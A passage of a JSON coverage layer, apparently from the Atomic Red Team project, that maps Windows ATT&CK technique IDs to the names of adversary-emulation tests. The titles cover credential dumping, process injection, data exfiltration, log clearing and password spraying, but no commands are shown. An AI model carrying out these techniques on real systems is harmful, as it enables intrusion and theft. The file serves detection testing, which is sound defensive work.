Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote 